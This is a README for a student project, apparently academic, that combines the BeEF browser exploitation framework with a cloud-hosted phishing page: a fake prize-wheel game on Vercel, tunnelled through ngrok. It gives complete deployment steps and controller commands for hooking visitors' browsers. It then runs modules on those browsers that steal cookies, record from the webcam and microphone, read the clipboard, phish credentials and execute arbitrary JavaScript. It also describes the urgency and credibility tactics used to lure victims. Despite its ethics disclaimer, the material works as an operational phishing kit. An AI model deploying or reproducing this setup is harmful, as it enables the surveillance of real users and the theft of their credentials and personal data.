Academic Project - Browser Exploitation Framework (BeEF) with cloud-hosted phishing infrastructure for cybersecurity research and education.
- Project Overview
- Architecture
- Prerequisites
- Installation Guide
- Configuration
- Usage Guide
- File Structure & Purpose
- Available Exploits
- Troubleshooting
- Security & Ethics
- Team
BeEF Cloud Exploitation Platform is an offensive security toolkit that demonstrates browser-based exploitation techniques using the Browser Exploitation Framework (BeEF). This project was developed for academic purposes at FAST-NUCES to understand web security vulnerabilities and browser exploitation methodologies.
- Phishing Infrastructure: Hosts a fake "Spin & Win" game on Vercel that appears legitimate to trick users
- Browser Hooking: Injects BeEF hook into victim's browser to establish persistent connection
- Exploit Automation: Python controller (
hijack.py) automates execution of browser exploits - Cloud Tunneling: Uses ngrok to expose local BeEF server securely over HTTPS
- Data Extraction: Captures browser information, cookies, geolocation, and other sensitive data
- β Automated exploit execution via CLI
- β Real-time browser monitoring
- β Result saving to local directory
- β Professional phishing page design
- β Token-based authentication with BeEF API
- β Support for 12+ exploit modules
βββββββββββββββ ββββββββββββββββ βββββββββββββββ
β Victim ββββββββββΆβ Vercel ββββββββββΆβ ngrok β
β Browser β β (Phishing) β β Tunnel β
βββββββββββββββ ββββββββββββββββ βββββββββββββββ
β β
β β
βΌ βΌ
ββββββββββββββββ βββββββββββββββ
β hook.js + β β BeEF β
β beef-proxy β β Framework β
β Functions β β (Kali) β
ββββββββββββββββ βββββββββββββββ
β²
β
β
βββββββββββββββ
β hijack.py β
β Controller β
βββββββββββββββ
Flow:
- Victim visits phishing page on Vercel (https://beef-hijack.vercel.app)
- BeEF hook loads via
/api/hookendpoint (proxies through Vercel to ngrok) - Victim's browser connects to BeEF server on Kali Linux
- Attacker uses
hijack.pyto execute exploits remotely - Results saved locally for analysis
- Windows 10/11 with WSL2 support
- Internet connection
- GitHub account
- Vercel account (free tier)
- ngrok account (free tier)
- Basic command line knowledge
-
Enable WSL2 on Windows:
Open PowerShell as Administrator and run:
wsl --installRestart your computer when prompted.
-
Install Kali Linux from Microsoft Store:
- Open Microsoft Store
- Search for "Kali Linux"
- Click "Get" or "Install"
- Wait for installation to complete
-
Launch Kali Linux:
- Search "Kali" in Windows Start Menu
- Click "Kali Linux"
- Create username and password when prompted
-
Update Kali Linux:
sudo apt update && sudo apt upgrade -y
-
Check if Python is installed:
python3 --version
Kali usually comes with Python pre-installed. If not, install it:
sudo apt install python3 python3-pip python3-venv -y
-
Verify pip installation:
pip3 --version
-
Install BeEF dependencies:
sudo apt install beef-xss -y
OR install from source (recommended for latest version):
cd ~ sudo apt install curl git ruby ruby-dev libsqlite3-dev build-essential -y git clone https://github.com/beefproject/beef.git cd beef sudo gem install bundler bundle install
-
Configure BeEF credentials:
Edit the config file:
nano ~/beef/config.yamlFind and set:
credentials: user: "beef" passwd: "123456"
Save and exit (Ctrl+X, Y, Enter).
-
Test BeEF installation:
cd ~/beef ./beef
You should see BeEF starting. Access it at
http://localhost:3000/ui/panel- Username:
beef - Password:
123456
Press Ctrl+C to stop BeEF for now.
- Username:
-
Download ngrok:
cd ~ wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
-
Extract ngrok:
tar -xvzf ngrok-v3-stable-linux-amd64.tgz sudo mv ngrok /usr/local/bin/
-
Create ngrok account:
- Visit https://ngrok.com/
- Sign up for free account
- Copy your authtoken from dashboard
-
Configure ngrok:
ngrok config add-authtoken YOUR_AUTH_TOKEN_HERE
Replace
YOUR_AUTH_TOKEN_HEREwith your actual token. -
Test ngrok:
ngrok http 3000
You should see a forwarding URL like
https://abc123.ngrok-free.appPress Ctrl+C to stop.
-
Create project directory:
mkdir -p ~/beef_hijack cd ~/beef_hijack
-
Clone or create project files:
If you have a Git repository:
git clone YOUR_REPO_URL .Otherwise, create files manually (see File Structure section).
-
Create Python virtual environment:
python3 -m venv .venv
-
Activate virtual environment:
source .venv/bin/activateYour prompt should now show
(.venv). -
Install Python dependencies:
pip install requests rich
-
Make hijack.py executable:
chmod +x hijack.py
-
Install Vercel CLI (on Windows PowerShell):
npm install -g vercelIf you don't have Node.js, install it from https://nodejs.org/
-
Navigate to project directory (Windows):
cd \\wsl.localhost\kali-linux\home\kali\beef_hijack -
Initialize Vercel project:
vercel
- Select "Continue with GitHub/GitLab/Bitbucket" or "Continue with Email"
- Link to existing project or create new one
- Project name:
beef-hijack(or your choice) - Directory:
./ - Override settings: No
-
Deploy to production:
vercel --prodNote your production URL (e.g.,
https://beef-hijack.vercel.app) -
Configure environment variable:
After deployment, you need to add the ngrok URL as an environment variable:
vercel env add BEEF_SERVER_URL
When prompted:
- Environment: Production
- Value: Your ngrok URL (e.g.,
https://abc123.ngrok-free.app)
β οΈ IMPORTANT: You must update this environment variable in Vercel EVERY TIME you restart ngrok, as the URL changes with the free tier. -
Redeploy after setting environment variable:
vercel --prod
Edit hijack.py if you changed BeEF credentials:
BEEF_HOST = "localhost"
BEEF_PORT = 3000
BEEF_USER = "beef"
BEEF_PASS = "123456"Every time you start ngrok, you MUST update the Vercel environment variable:
Method 1: Via Vercel Dashboard (Web)
- Go to https://vercel.com/dashboard
- Select your project (
beef-hijack) - Go to Settings β Environment Variables
- Find
BEEF_SERVER_URL - Click Edit
- Update with new ngrok URL (e.g.,
https://xyz789.ngrok-free.app) - Click Save
- Redeploy: Click Deployments β β― β Redeploy
Method 2: Via CLI
vercel env rm BEEF_SERVER_URL production
vercel env add BEEF_SERVER_URL production
# Enter new ngrok URL when prompted
vercel --prodFollow these steps in order every time you want to use the framework:
cd ~/beef
./beefKeep this terminal open. BeEF should be running at http://localhost:3000/ui/panel
Open a new terminal (Ctrl+Shift+T) and run:
ngrok http 3000Copy the HTTPS forwarding URL (e.g., https://abc123.ngrok-free.app)
Keep this terminal open.
cd \\wsl.localhost\kali-linux\home\kali\beef_hijack
vercel env rm BEEF_SERVER_URL production
vercel env add BEEF_SERVER_URL production
# Paste ngrok URL when prompted
vercel --prodWait for deployment to complete (~30 seconds).
Open another new terminal and run:
cd ~/beef_hijack
source .venv/bin/activateNow you're ready to use the controller!
python3 hijack.py --statusShows:
- BeEF server status
- Your local IP
- ngrok tunnel status (if running)
python3 hijack.py --monitorContinuously checks for new victim connections. Press Ctrl+C to stop.
python3 hijack.py --listDisplays table of all connected victims with:
- Session ID
- IP Address
- Browser name and version
- Operating system
- Hook timestamp
python3 hijack.py --exploit alert --session SESSION_IDReplace SESSION_ID with actual session from --list output.
Example:
python3 hijack.py --exploit alert --session LFw6aU8buhMnp7R3iAESsj2OnocVgRNOepcAKf0i55rRMun9MRTkSQKx3j39qbBnvOpbEI4AkIu5xeqIpython3 hijack.py --exploit all --session SESSION_IDRuns all enabled exploit modules sequentially.
python3 hijack.py --exploit all --session SESSION_ID --saveCreates a timestamped directory (results_SESSION_TIMESTAMP/) containing:
victim_info.json- Browser fingerprint and system infoall_commands.json- All executed commands and resultsREPORT.txt- Human-readable summary
python3 hijack.py --exploit raw_js --session SESSION_ID --code "alert('Hacked!');"python3 hijack.py --exploit redirect --session SESSION_ID --url "https://example.com"-
Open your Vercel deployment URL in a browser:
https://beef-hijack.vercel.app -
The "Spin & Win" game will request camera and microphone permissions.
-
After granting permissions (or clicking anywhere), the game loads and BeEF hook activates.
-
Check for hooked browser:
python3 hijack.py --list
-
Execute exploits on the hooked session.
beef_hijack/
β
βββ hijack.py # Main Python controller script
βββ index.html # Phishing page (Spin & Win game)
βββ README.md # This documentation file
βββ issues.txt # Known issues and notes (optional)
β
βββ api/ # Vercel serverless functions
β βββ hook.js # Proxies BeEF hook.js from ngrok to victim
β βββ beef-proxy.js # Proxies BeEF API requests
β βββ config.js # Returns ngrok URL to frontend
β
βββ .venv/ # Python virtual environment (created during setup)
Purpose: Command-line interface for BeEF automation
What it does:
- Checks if BeEF server is running
- Authenticates with BeEF API using token-based auth
- Lists all hooked (compromised) browsers
- Executes exploit modules on victim browsers
- Saves exploit results to local files
- Provides real-time monitoring of new victims
Key functions:
get_beef_token()- Authenticates and retrieves API tokenget_hooked_browsers()- Fetches list of active victimsrun_exploit()- Executes a specific exploit modulerun_all_exploits()- Runs all enabled exploits sequentiallysave_exploit_results()- Exports data to JSON/text files
CLI Arguments:
--status- Check BeEF and system status--monitor- Watch for new hooked browsers--list- Display all connected victims--exploit [name|all]- Execute exploit(s)--session SESSION_ID- Target specific victim--save- Export results to files--code CODE- Custom JavaScript for raw_js exploit--url URL- Target URL for redirect exploit
Purpose: Fake "Spin & Win" game to hook victims
What it does:
- Displays professional-looking prize wheel game
- Requests camera and microphone permissions (required for some exploits)
- Loads BeEF hook.js in the background without victim knowing
- Maintains connection even after page navigation
Key features:
- Gradient background with responsive design
- 6-segment spinning wheel with prizes (iPhone, Cash, AirPods, etc.)
- Permission request flow before showing game
- BeEF hook loads via
/api/hookendpoint (Vercel proxy) - Spin animation and confetti effects
Social engineering tactics:
- "Only 3 spins left today!" creates urgency
- Legitimate-looking prizes increase credibility
- Permission request appears as normal browser feature
- Professional design reduces suspicion
Purpose: Vercel serverless function that proxies BeEF's hook.js
What it does:
- Fetches
hook.jsfrom BeEF server via ngrok URL - Modifies script to fix any path issues
- Serves it to victim's browser with correct CORS headers
- Hides actual BeEF server location from victim
Why needed:
- Vercel frontend can't directly access Kali server
- ngrok provides HTTPS tunnel for secure connection
- CORS restrictions require proxy for cross-origin requests
- Victim sees only Vercel domain, not internal infrastructure
Purpose: Proxies all BeEF API requests from frontend to backend
What it does:
- Forwards API calls from victim browser to BeEF server
- Handles authentication and headers
- Maintains persistent connection for command execution
- Returns responses back to victim browser
Endpoints proxied:
/api/hooks- Hook registration and updates/api/modules- Available exploit modules- Command execution endpoints
Purpose: Returns ngrok URL to frontend
What it does:
- Reads
BEEF_SERVER_URLenvironment variable from Vercel - Provides it to
index.htmlso BeEF hook knows where to connect - Updates dynamically when environment variable changes
Environment variable:
BEEF_SERVER_URL = https://your-ngrok-url.ngrok-free.app
| Exploit Name | Module ID | Description | Status |
|---|---|---|---|
alert |
285 | Shows alert dialog with custom message | β Working |
redirect |
260 | Redirects browser to specified URL | |
geolocation |
104 | Retrieves GPS coordinates via browser API | |
cookies |
277 | Steals all cookies from current domain | |
screenshot |
246 | Captures screenshot of victim's browser | |
fingerprint |
289 | Collects detailed browser fingerprint | |
history |
288 | Retrieves browsing history | |
webcam |
252 | Attempts to access webcam (HTML5 API) | |
clipboard |
127 | Reads clipboard contents | |
record_audio |
26 | Starts audio recording via microphone | |
pretty_theft |
8 | Fake login form for credential phishing | |
fake_notification |
17 | Shows fake browser notification bar | |
raw_js |
80 | Executes custom JavaScript code |
Note: Some exploits may not work due to browser security policies, permissions, or BeEF version compatibility. The project is currently in testing phase to identify reliably working modules.
Error: Address already in use or Port 3000 is busy
Solution:
# Find process using port 3000
sudo lsof -i :3000
# Kill the process
sudo kill -9 PID_NUMBER
# Or use killall
sudo killall beefProblem: Free ngrok tier generates new URL on each restart
Solution:
- This is expected behavior with free tier
- Always update Vercel environment variable after restarting ngrok
- Consider ngrok paid plan for static URL
- Create a script to automate Vercel update:
# save as update_vercel.sh
#!/bin/bash
NGROK_URL=$(curl -s http://localhost:4040/api/tunnels | grep -o 'https://[^"]*\.ngrok-free\.app' | head -1)
echo "Detected ngrok URL: $NGROK_URL"
vercel env rm BEEF_SERVER_URL production --yes
echo $NGROK_URL | vercel env add BEEF_SERVER_URL production
vercel --prodPossible causes:
- Victim didn't visit page: Share Vercel URL with target
- BeEF hook failed to load: Check browser console (F12) for errors
- Vercel environment variable wrong: Verify
BEEF_SERVER_URLmatches ngrok URL - ngrok tunnel closed: Check if ngrok is still running
- CORS errors: Redeploy Vercel after changing environment variable
Debug steps:
# Check BeEF logs
cd ~/beef
tail -f logs/beef.log
# Check ngrok status
curl http://localhost:4040/api/tunnels
# Test Vercel proxy
curl https://beef-hijack.vercel.app/api/configKnown issue: Some BeEF modules show "Success" but don't execute
Causes:
- Browser security policies block actions
- Permissions not granted (camera, microphone, clipboard)
- Module incompatibility with victim browser
- Timing issues (command queued but not executed)
Solution:
- Test exploits one by one to find working ones
- Check BeEF UI (
http://localhost:3000/ui/panel) for actual results - Some exploits work only on specific browsers/OS
- Use
--saveflag to verify results in output files
Error: ModuleNotFoundError: No module named 'requests' or 'rich'
Solution:
# Activate virtual environment first
source .venv/bin/activate
# Install dependencies
pip install requests rich
# Verify installation
pip list | grep -E 'requests|rich'Error: bash: ./hijack.py: Permission denied
Solution:
chmod +x hijack.py
# Or run with python3 explicitly
python3 hijack.py --statusError: Error: No framework detected
Solution:
- Ensure you're in correct directory:
\\wsl.localhost\kali-linux\home\kali\beef_hijack - Check
api/folder exists with .js files - Try manual framework selection:
vercel --prod --yes
Solution:
# In Windows PowerShell (as Admin)
wsl --shutdown
# Restart Kali Linux from Start MenuThis project is intended SOLELY for educational and research purposes as part of an academic curriculum at FAST-NUCES.
Unauthorized use of this framework against systems you don't own or have explicit permission to test is ILLEGAL and may result in:
- Criminal charges under Computer Fraud and Abuse Act (CFAA)
- Civil lawsuits
- Academic expulsion
- Permanent criminal record
β DO:
- Use only in controlled lab environments
- Test on your own devices/accounts
- Obtain written permission before testing
- Document findings for educational purposes
- Report vulnerabilities responsibly
- Follow your institution's acceptable use policies
β DON'T:
- Deploy phishing pages targeting real users
- Use on public networks without authorization
- Steal credentials or personal data
- Distribute malware or harmful code
- Share access to compromised systems
- Violate privacy laws (GDPR, CCPA, etc.)
- Always disclose: If demonstrating to others, inform them beforehand
- Isolated testing: Use virtual machines or test devices
- Data protection: Delete captured data after analysis
- Responsible disclosure: Report vulnerabilities to vendors
- Academic integrity: Follow university ethics board guidelines
Project: BeEF Cloud Exploitation Platform
Institution: FAST-NUCES (National University of Computer and Emerging Sciences)
Course: Cybersecurity / Offensive Security
Purpose: Academic bonus marks project
Team Members:
- Bilal Ahmad - Roll No: 22L-7472
- Shahzad Waris - Roll No: 22L-7530
- Umair Imran - Roll No: 22L-8370
- Official Wiki: https://github.com/beefproject/beef/wiki
- Module Reference: https://github.com/beefproject/beef/wiki/Module-Development
- Getting Started: https://ngrok.com/docs/getting-started
- Agents API: https://ngrok.com/docs/agent
- Serverless Functions: https://vercel.com/docs/functions
- Environment Variables: https://vercel.com/docs/environment-variables
- OWASP Testing Guide: https://owasp.org/www-project-web-security-testing-guide/
- Browser Security Handbook: https://code.google.com/archive/p/browsersec/
- Initial release with basic BeEF integration
- Token-based authentication
- 13 exploit modules
- Result saving functionality
- Professional phishing page design
- Complete documentation
This is an academic project and not actively maintained for public contributions. However, if you're a student working on similar projects:
- Fork this repository
- Create feature branch (
git checkout -b feature/improvement) - Document your changes thoroughly
- Submit pull request with detailed explanation
This project is provided for educational purposes only under academic fair use.
No warranty is provided. The authors are not responsible for any misuse or damage caused by this software.
For questions or issues related to this project:
- Check Troubleshooting section first
- Review BeEF documentation for module-specific issues
- Contact project team members via university email
- Consult course instructor for academic guidance
Last Updated: November 2025
Version: 1.0
Status: Active Development / Testing Phase